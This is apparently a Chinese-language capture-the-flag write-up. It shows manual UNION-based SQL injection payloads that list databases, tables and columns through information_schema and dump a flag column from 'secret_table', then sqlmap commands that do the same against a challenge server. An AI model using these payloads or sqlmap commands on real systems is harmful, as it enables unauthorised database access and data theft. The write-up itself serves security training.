手工注入
查詢所有數據庫名稱和表名
’ union select 1,table_schema,table_name from information_schema.tables#
- 發現就兩個數據庫information_schema與news
- 查詢news數據庫中的表的名稱
’ union select 1,table_schema,table_name from information_schema.tables where table_schema=‘news’ #
- 查詢secret_table裏面的列名
’ union select 1,table_name,column_name from information_schema.columns where table_name=‘secret_table’ #
- 查詢fl4g裏的字段
’ union select 1,1,fl4g from secret_table #
sqlmap
sqlmap常用命令:
https://www.cnblogs.com/iAmSoScArEd/articles/9263735.html
- post的注入方式 sqlmap -u “url” --data “search=suibianxie”
- 查看錶信息
- sqlmap -u “http://111.198.29.45:31363/” --data “search=acf” --columns
- 查看fl4g字段 --dump查看錶中數據即可
- sqlmap -u “http://111.198.29.45:31363/” --data “search=acf” -T secret_table --dump